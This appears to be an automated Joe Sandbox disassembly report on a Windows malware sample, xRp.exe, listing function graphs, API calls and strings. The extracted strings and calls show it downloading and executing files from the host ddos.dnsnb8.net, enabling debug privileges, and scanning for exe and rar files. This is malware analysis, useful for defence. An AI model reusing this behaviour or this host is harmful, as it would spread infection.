                                      • Opcode ID: 6a9a0ccfd176a00a02f13b5bfef423378e30b55923662261d186681c6daa4234
                                      • Instruction ID: 1db8fc036f567fca3ede2a4b057bb9e7e80ab02c9448cec51288cf3e6e11f445
                                      • Opcode Fuzzy Hash: 6a9a0ccfd176a00a02f13b5bfef423378e30b55923662261d186681c6daa4234
                                      • Instruction Fuzzy Hash: 87F1B471940248EFCB20DFA6DD84AADBBB5FF08315F10452EE519AB261D778AD41CF18

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 117 4e28b8-4e28ff memset wsprintfA 118 4e29db-4e29df 117->118 119 4e2905-4e290d 117->119 119->118 120 4e2913-4e2919 119->120 121 4e291b-4e294c memset wsprintfA call 4e29e2 120->121 122 4e2956-4e2965 strrchr 120->122 125 4e2951 121->125 122->118 124 4e2967-4e2978 lstrcmpiA 122->124 126 4e297a-4e2981 call 4e1e6e 124->126 127 4e2988-4e2992 lstrcmpiA 124->127 125->118 130 4e2986 126->130 127->118 129 4e2994-4e299b 127->129 131 4e29ad-4e29c9 strstr 129->131 132 4e299d-4e29a3 129->132 130->118 133 4e29cb-4e29d1 call 4e239d 131->133 134 4e29d3-4e29d6 call 4e2692 131->134 132->131 135 4e29a5-4e29a7 lstrcpy 132->135 133->118 134->118 135->131
                                      APIs
                                      • memset.MSVCRT ref: 004E28D3
                                      • wsprintfA.USER32 ref: 004E28F7
                                      • memset.MSVCRT ref: 004E2925
                                      • wsprintfA.USER32 ref: 004E2940
                                        • Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2A02
                                        • Part of subcall function 004E29E2: wsprintfA.USER32 ref: 004E2A1A
                                        • Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2A44
                                        • Part of subcall function 004E29E2: lstrlen.KERNEL32(?), ref: 004E2A54
                                        • Part of subcall function 004E29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 004E2A6C
                                        • Part of subcall function 004E29E2: strrchr.MSVCRT ref: 004E2A7C
                                        • Part of subcall function 004E29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 004E2A9F
                                        • Part of subcall function 004E29E2: lstrlen.KERNEL32(Documents and Settings), ref: 004E2AAE
                                        • Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2AC6
                                        • Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2ADA
                                        • Part of subcall function 004E29E2: FindFirstFileA.KERNEL32(?,?), ref: 004E2AEF
                                        • Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2B13
                                      • strrchr.MSVCRT ref: 004E2959
                                      • lstrcmpiA.KERNEL32(00000001,exe), ref: 004E2974
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                      • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                      • API String ID: 3004273771-3007274656
                                      • Opcode ID: 7fcbad6cd1e4cf29d4ea0e1dede479290ff50badd79e33ad41b8be5d49db91b0
                                      • Instruction ID: f265c80d63f2402e017df6fa9e7f93d8881ba041d6ad2a0c1094f37f32f82141
                                      • Opcode Fuzzy Hash: 7fcbad6cd1e4cf29d4ea0e1dede479290ff50badd79e33ad41b8be5d49db91b0
                                      • Instruction Fuzzy Hash: E131D7B1A4038C77DB219B67DC89FDA375C9B10316F140467F58597182D6FC9AC48B68

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 139 4e1973-4e199a PathFileExistsA 140 4e1ac7-4e1acc 139->140 141 4e19a0-4e19aa 139->141 142 4e1ace 140->142 143 4e1ad0-4e1ad5 140->143 144 4e19af-4e19c2 CreateFileA 141->144 142->143 145 4e1ad7-4e1ad9 143->145 146 4e1af0-4e1af6 143->146 147 4e1a28-4e1a36 GetFileSize 144->147 148 4e19c4-4e19d3 Sleep 144->148 145->146 149 4e1a38-4e1a3b 147->149 150 4e1a87-4e1a8b 147->150 148->144 151 4e19d5-4e1a0b call 4e185b wsprintfA 148->151 149->150 152 4e1a3d-4e1a51 VirtualAlloc 149->152 153 4e1a8d-4e1a90 FindCloseChangeNotification 150->153 154 4e1a96-4e1a9a 150->154 151->147 171 4e1a0d-4e1a26 151->171 152->150 156 4e1a53-4e1a57 152->156 153->154 157 4e1a9c 154->157 158 4e1aad-4e1ab1 154->158 160 4e1a59-4e1a6d ReadFile 156->160 161 4e1a80 156->161 162 4e1aa0-4e1aa6 157->162 163 4e1adb-4e1ae0 158->163 164 4e1ab3-4e1ab6 158->164 160->150 165 4e1a6f-4e1a7e 160->165 161->150 162->158 166 4e1ae7-4e1aec 163->166 167 4e1ae2-4e1ae5 163->167 164->140 169 4e1ab8-4e1ac1 VirtualFree 164->169 165->160 165->161 166->146 170 4e1aee 166->170 167->166 169->140 170->146 171->147 173 4e1a9e 171->173 173->162
                                      APIs
                                      • PathFileExistsA.SHLWAPI(\NN`NN,00000000,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E1992
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004E19BA
                                      • Sleep.KERNEL32(00000064), ref: 004E19C6
                                      • wsprintfA.USER32 ref: 004E19EC
                                      • GetFileSize.KERNEL32(?,00000000), ref: 004E1A2C
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004E1A46
                                      • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E1A65
                                      • FindCloseChangeNotification.KERNEL32(000000FF), ref: 004E1A90
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004E1AC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: File$Virtual$AllocChangeCloseCreateExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                      • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$\NN`NN
                                      • API String ID: 1914996623-3151157146
                                      • Opcode ID: 381c50c9ac3146a720c46adbb552bef7fe50b59084a02df6d1c9697682d88f1d
                                      • Instruction ID: 026a45342362f1b6204e004c039ac945caea23ced6dfa1ffa1609ed33b3ced0d
                                      • Opcode Fuzzy Hash: 381c50c9ac3146a720c46adbb552bef7fe50b59084a02df6d1c9697682d88f1d
                                      • Instruction Fuzzy Hash: 1E515D71941299AFCB219F99CCC8ABEBBB8FB04356F10457AF515E72A0C3749E40CB58

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 174 4e1099-4e10b4 175 4e10ba-4e10c7 174->175 176 4e1199-4e119c 174->176 177 4e10c8-4e10d4 175->177 178 4e10da 177->178 179 4e1184-4e1190 177->179 181 4e1113-4e1162 call 4e185b wsprintfA * 2 URLDownloadToFileA 178->181 179->177 180 4e1196-4e1198 179->180 180->176 184 4e10dc-4e110d call 4e1000 WinExec lstrlen 181->184 185 4e1168-4e1182 lstrlen Sleep 181->185 184->180 184->181 185->179 185->181
                                      APIs
                                        • Part of subcall function 004E185B: GetSystemTimeAsFileTime.KERNEL32(004E1F92,00000000,?,00000000,?,?,?,004E1F92,?,00000000,00000002), ref: 004E1867
                                        • Part of subcall function 004E185B: srand.MSVCRT ref: 004E1878
                                        • Part of subcall function 004E185B: rand.MSVCRT ref: 004E1880
                                        • Part of subcall function 004E185B: srand.MSVCRT ref: 004E1890
                                        • Part of subcall function 004E185B: rand.MSVCRT ref: 004E1894
                                      • WinExec.KERNEL32(?,00000005), ref: 004E10F1
                                      • lstrlen.KERNEL32(004E4748), ref: 004E10FA
                                      • wsprintfA.USER32 ref: 004E112A
                                      • wsprintfA.USER32 ref: 004E1143
                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 004E115B
                                      • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 004E1169
                                      • Sleep.KERNEL32 ref: 004E1179
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                      • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGN$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                      • API String ID: 1280626985-845689471
                                      • Opcode ID: 0db5e2dedaeb7db008316c00cf7333afb886a5e8b0dff83cd634f8511b89d892
                                      • Instruction ID: 3e09ee5303e8da375a28310b1c647a6e531f4b709ccc3a9d5dc236ad296e8e23
                                      • Opcode Fuzzy Hash: 0db5e2dedaeb7db008316c00cf7333afb886a5e8b0dff83cd634f8511b89d892
                                      • Instruction Fuzzy Hash: 1F21A671D001C8BACB11DBA1DC88BAFBB7CAB45317F1140A6E100A7162D7785B44CF58

                                      Control-flow Graph

                                      APIs
                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 004E164F
                                      • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 004E165B
                                      • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,00000104), ref: 004E166E
                                      • CreateThread.KERNEL32(00000000,00000000,004E1099,00000000,00000000,00000000), ref: 004E16AC
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 004E16BD
                                        • Part of subcall function 004E139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E13BC
                                        • Part of subcall function 004E139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004E13DA
                                        • Part of subcall function 004E139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 004E1448
                                      • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E16E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$C:\Windows\system32$Documents and Settings
                                      • API String ID: 123563730-717810370
                                      • Opcode ID: e68519f31ddf66cba6fe373c6d82a5d5ba4122cce44dd2530a69437980282c4c
                                      • Instruction ID: 8bfc4337bdbca881232ee67ac0aac02315bb8ff00eae03670ee16a610ab98cab
                                      • Opcode Fuzzy Hash: e68519f31ddf66cba6fe373c6d82a5d5ba4122cce44dd2530a69437980282c4c
                                      • Instruction Fuzzy Hash: 3B11B4715801D47BCB226BA39D8DEAB3F6DEB85767F100066F2099A076C6788540C7AD

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 207 4e1000-4e1023 CreateFileA 208 4e1025-4e1055 GetFileSize CreateFileMappingA MapViewOfFile 207->208 209 4e1092-4e1096 207->209 210 4e107b-4e1085 208->210 211 4e1057-4e105f 208->211 214 4e108d-4e1091 CloseHandle 210->214 215 4e1087-4e108b CloseHandle 210->215 212 4e1074-4e1075 UnmapViewOfFile 211->212 213 4e1061-4e106e call 4e17d0 211->213 212->210 213->212 214->209 215->214
                                      APIs
                                      • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGN,http://%s:%d/%s/%s,004E10E8,?), ref: 004E1018
                                      • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 004E1029
                                      • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 004E1038
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 004E104B
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 004E1075
                                      • CloseHandle.KERNEL32(?), ref: 004E108B
                                      • CloseHandle.KERNEL32(00000000), ref: 004E108E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                      • String ID: HGN$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                      • API String ID: 1223616889-3975667283
                                      • Opcode ID: 48dbff914e9eea6dae79ccae72959fa994a1388bdeafda1574a3bdef35420018
                                      • Instruction ID: 37ef39f599d17b384bde9bad8b339f3199618aa7f2d1efbcc258bcbfffe5bba1
                                      • Opcode Fuzzy Hash: 48dbff914e9eea6dae79ccae72959fa994a1388bdeafda1574a3bdef35420018
                                      • Instruction Fuzzy Hash: C901A17154028CBFE7316F619CC8E3BBBACEB407AAF00053AF244A75A1D6745E448B68

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 378 4e2c48-4e2c75 memset call 4e1973 381 4e2c77-4e2c7f 378->381 382 4e2cb2-4e2cb9 378->382 383 4e2c8f-4e2cac CreateThread WaitForMultipleObjects 381->383 384 4e2c81-4e2c8b 381->384 385 4e2cbb-4e2cc2 VirtualFree 382->385 386 4e2cc8-4e2ccc 382->386 383->382 384->383 385->386
                                      APIs
                                      • memset.MSVCRT ref: 004E2C57
                                        • Part of subcall function 004E1973: PathFileExistsA.SHLWAPI(\NN`NN,00000000,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E1992
                                        • Part of subcall function 004E1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004E19BA
                                        • Part of subcall function 004E1973: Sleep.KERNEL32(00000064), ref: 004E19C6
                                        • Part of subcall function 004E1973: wsprintfA.USER32 ref: 004E19EC
                                        • Part of subcall function 004E1973: GetFileSize.KERNEL32(?,00000000), ref: 004E1A2C
                                        • Part of subcall function 004E1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004E1A46
                                        • Part of subcall function 004E1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E1A65
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 004E2C99
                                      • WaitForMultipleObjects.KERNEL32(00000001,004E16BA,00000001,000000FF,?,004E16BA,00000000), ref: 004E2CAC
                                      • VirtualFree.KERNEL32(00550000,00000000,00008000,C:\Users\user\AppData\Local\Temp\xRp.exe,004E4E5C,004E4E60,?,004E16BA,00000000), ref: 004E2CC2
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E2C69
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: File$CreateVirtual$AllocExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe
                                      • API String ID: 1898859962-1450390661
                                      • Opcode ID: 2b59df5f325b8e03ce68124f1ca2e4ad2281a272e3f0c59667daeb6b7c4f562d
                                      • Instruction ID: 49db2855e01091aaee9f3634a69d0c2469b8d49ec46d74435a12ae17e09128a2
                                      • Opcode Fuzzy Hash: 2b59df5f325b8e03ce68124f1ca2e4ad2281a272e3f0c59667daeb6b7c4f562d
                                      • Instruction Fuzzy Hash: 2D01D471A412A07BD7109BA6DC4EFAF7F5CEF41B22F204426F504DA1C2D5E89A00C3A8

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 387 4e14e1-4e14fb 388 4e14fd-4e1510 GetModuleHandleA 387->388 389 4e1541-4e1547 387->389 392 4e151a-4e1535 VirtualQuery 388->392 393 4e1512-4e1518 388->393 390 4e1549-4e154c 389->390 391 4e1573-4e1574 call 4e1638 389->391 394 4e154e-4e1555 390->394 395 4e1569-4e1570 390->395 400 4e1579-4e157a ExitProcess 391->400 397 4e153b 392->397 398 4e1537-4e1539 392->398 393->389 394->395 399 4e1557-4e1566 call 4e1af9 394->399 397->389 398->389 398->397 399->395
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004E1504
                                      • VirtualQuery.KERNEL32(004E14E1,?,0000001C), ref: 004E1525
                                      • ExitProcess.KERNEL32 ref: 004E157A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: ExitHandleModuleProcessQueryVirtual
                                      • String ID:
                                      • API String ID: 3946701194-0
                                      • Opcode ID: 9334d0d7044b76006857097e60a6f6041b5002937508cb5cfc51da5c7a95cbcc
                                      • Instruction ID: d97ecb30bedd7ee3ff033f98dcf0f20fffc81b3f3cb1e4667645d4fd3da60584
                                      • Opcode Fuzzy Hash: 9334d0d7044b76006857097e60a6f6041b5002937508cb5cfc51da5c7a95cbcc
                                      • Instruction Fuzzy Hash: 7A115171D80294EFCB11DF67ACC4A7E77A8EBC8766B10403BF402DA261D23889419B59

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 403 4e1915-4e1922 404 4e1928-4e192c 403->404 405 4e1924-4e1926 403->405 407 4e192e-4e194d memset GetFileTime 404->407 408 4e194f-4e1952 404->408 406 4e196e-4e1970 405->406 409 4e1966-4e1968 407->409 408->406 410 4e1954-4e1960 SetFileTime 408->410 411 4e196c 409->411 412 4e196a 409->412 410->409 411->406 412->411
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: FileTimememset
                                      • String ID:
                                      • API String ID: 176422537-0
                                      • Opcode ID: 52624e0b1429b1e7486491994f3c9ad7ace31551a88d8c71c47ed2351749105f
                                      • Instruction ID: 6386549464bf0bbadc31319f03c989ddfdf829b34355fd70631163e62f8ad08f
                                      • Opcode Fuzzy Hash: 52624e0b1429b1e7486491994f3c9ad7ace31551a88d8c71c47ed2351749105f
                                      • Instruction Fuzzy Hash: 86F0A472240249ABC7208E23DC04AA777ACAB50362F00893BF516C5161E774D645CBA4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 413 4e6159-4e615c 414 4e615f-4e6189 VirtualFree 413->414 415 4e618c-4e6192 414->415 416 4e6198-4e61b0 VirtualFree 415->416 417 4e60c7-4e60cf 415->417 419 4e61ba-4e61c8 416->419 420 4e61b2-4e61b4 416->420 417->415 418 4e60d5-4e60f8 VirtualAlloc 417->418 438 4e60fe-4e6106 418->438 439 4e60fa-4e60fc call 4e66c8 418->439 422 4e61ca-4e61d7 419->422 423 4e6243-4e6251 419->423 420->419 427 4e61dd-4e61e0 422->427 425 4e6264-4e626f 423->425 426 4e6253 423->426 430 4e6271-4e6276 425->430 429 4e6255-4e6258 426->429 427->423 431 4e61e2-4e61f2 427->431 429->425 433 4e625a-4e6262 429->433 434 4e627c-4e6289 430->434 435 4e6389-4e63b1 VirtualProtect 430->435 436 4e61f5-4e61fe 431->436 433->429 455 4e628b 434->455 456 4e6292-4e6298 434->456 437 4e63b7-4e63ba 435->437 440 4e620c-4e6219 436->440 441 4e6200-4e6203 436->441 442 4e63fc-4e6416 VirtualProtect 437->442 443 4e63bc-4e63c2 437->443 446 4e6108-4e611d 438->446 447 4e6155 438->447 439->438 444 4e6238-4e623f 440->444 449 4e621b-4e6228 441->449 450 4e6205-4e6208 441->450 463 4e6418-4e641d 442->463 464 4e6420-4e6425 442->464 443->443 452 4e63c4 443->452 444->436 451 4e6241 444->451 453 4e611f-4e6121 446->453 447->414 449->444 457 4e622a-4e6236 450->457 458 4e620a 450->458 451->427 452->442 460 4e63c6-4e63cf 452->460 461 4e6123 453->461 462 4e6151-4e6154 453->462 455->456 459 4e62a2-4e62ac 456->459 457->444 458->444 465 4e62ae 459->465 466 4e62b1-4e62c8 459->466 467 4e63d4-4e63d8 460->467 468 4e63d1 460->468 461->462 469 4e6125-4e6128 461->469 462->447 465->466 470 4e62ce-4e62d4 466->470 471 4e6373-4e6384 466->471 472 4e63dd-4e63e1 467->472 473 4e63da 467->473 468->467 474 4e612a-4e612e 469->474 475 4e6134-4e613b 469->475 477 4e62da-4e62f1 470->477 478 4e62d6-4e62d9 470->478 471->430 479 4e63e7-4e63fa VirtualProtect 472->479 480 4e63e3 472->480 473->472 474->475 482 4e6130-4e6132 474->482 475->482 483 4e613d-4e614f 475->483 485 4e6365-4e636e 477->485 486 4e62f3-4e62f9 477->486 478->477 479->437 479->442 480->479 482->453 483->453 485->459 487 4e62fb-4e630f 486->487 488 4e6314-4e6326 486->488 489 4e6426-4e64a9 487->489 490 4e634c-4e6360 488->490 491 4e6328-4e634a 488->491 500 4e64ab-4e64c0 489->500 501 4e6519-4e651c 489->501 490->489 491->485 505 4e6535-4e6537 500->505 506 4e64c2 500->506 502 4e651d-4e651e 501->502 503 4e6583-4e6587 501->503 508 4e6522-4e6533 502->508 507 4e6588-4e658b 503->507 509 4e659a 505->509 510 4e6539 505->510 511 4e64f8 506->511 512 4e64c5-4e64cd 506->512 513 4e658d-4e658f 507->513 514 4e65a1-4e65a3 507->514 508->505 517 4e659b-4e659d 509->517 515 4e653b-4e6541 510->515 516 4e65b4 510->516 520 4e656c-4e656f 511->520 521 4e64fa-4e64fe 511->521 518 4e64cf-4e64d4 512->518 519 4e6542-4e6545 512->519 522 4e6591-4e6593 513->522 515->519 528 4e65be-4e65db 516->528 517->522 524 4e659f 517->524 525 4e64d6-4e64d9 518->525 526 4e6517-4e6518 518->526 527 4e654d-4e6550 519->527 529 4e6572 520->529 521->529 530 4e6500 521->530 522->517 523 4e6595 522->523 523->509 524->507 525->527 531 4e64db-4e64f5 525->531 526->501 527->528 532 4e6552-4e6556 527->532 533 4e65dd-4e65f6 528->533 534 4e6573-4e6576 529->534 530->508 535 4e6502 530->535 531->511 536 4e6578-4e657a 532->536 537 4e6558-4e6569 532->537 538 4e65f7-4e6608 533->538 534->536 535->534 539 4e6504-4e6513 535->539 536->533 540 4e657c 536->540 537->520 539->505 541 4e6515 539->541 540->538 542 4e657e-4e657f 540->542 541->526 542->503
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 004E60DF
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 004E6189
                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004E61A5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: Virtual$Free$Alloc
                                      • String ID:
                                      • API String ID: 1852963964-0
                                      • Opcode ID: 3b018b46f7bcdb94bfa7adce1a81c5c692c51ad56c0574645c35c2d92c7c6073
                                      • Instruction ID: 04b838f5a7e71136f0dee55f2aabf5170862f9c0de705f2f94448068708998fd
                                      • Opcode Fuzzy Hash: 3b018b46f7bcdb94bfa7adce1a81c5c692c51ad56c0574645c35c2d92c7c6073
                                      • Instruction Fuzzy Hash: 0211BE31600688CFCB319F58CC813DE77A1FF50302F2A401ADE899B381DA792941CB88
                                      APIs
                                      • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,?,?,004E13EF), ref: 004E11AB
                                      • OpenProcessToken.ADVAPI32(00000000,00000028,004E13EF,?,?,?,?,?,?,004E13EF), ref: 004E11BB
                                      • AdjustTokenPrivileges.ADVAPI32(004E13EF,00000000,?,00000010,00000000,00000000), ref: 004E11EB
                                      • CloseHandle.KERNEL32(004E13EF), ref: 004E11FA
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,004E13EF), ref: 004E1203
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E11A5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
